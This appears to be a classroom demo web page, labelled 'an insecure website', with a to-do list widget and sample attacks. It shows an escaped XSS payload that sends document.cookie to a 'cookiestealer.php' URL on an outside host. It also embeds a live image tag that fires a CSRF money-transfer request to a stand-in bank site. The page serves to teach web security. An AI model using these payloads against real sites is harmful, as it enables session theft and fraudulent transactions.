<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title></title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <!-- Place favicon.ico and apple-touch-icon.png in the root directory -->
    </head>
    <body>
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->

        <!-- Add your site or application content here -->
        <p>Hello world! This is an insecure website</p>
        <p>&lt;script&gt;alert('hello world')&lt;/script&gt;</p>
        <p>&lt;script&gt;document.location="http://info2300.cs.cornell.edu/user/gdh56sp15/www/ajax/cookiestealer.php?cookie="+document.cookie; console.log(“I HAZ ALL TEH COOKEEZ”);&lt;/script&gt;<p>
        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
        <script>window.jQuery || document.write('<script src="js/vendor/jquery-1.10.2.min.js"><\/script>')</script>
        <script src="script.js"></script>
        <!-- Google Analytics: change UA-XXXXX-X to be your site's ID. -->
        <script>
            (function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]=
            function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date;
            e=o.createElement(i);r=o.getElementsByTagName(i)[0];
            e.src='//www.google-analytics.com/analytics.js';
            r.parentNode.insertBefore(e,r)}(window,document,'script','ga'));
            ga('create','UA-XXXXX-X');ga('send','pageview');
        </script>
        <h3>To Do List:</h3>
        <ul id="todo">
            <li>Make 2300 Lecture</li>
            <li>Grade Assignments</li>

        </ul>
        <input type="text" id="newTask"></input>
        <button id="addTask">Add Task</button>
        <br>
        <br>
        <br>
        <img src= "http://www.my-bank.com/logged_in_site.php?transaction=transfer&from=logged_user&to=hacker&amount=1000" alt= "image broken"/>
        <img src="haunter.jpg">
    </body>
</html>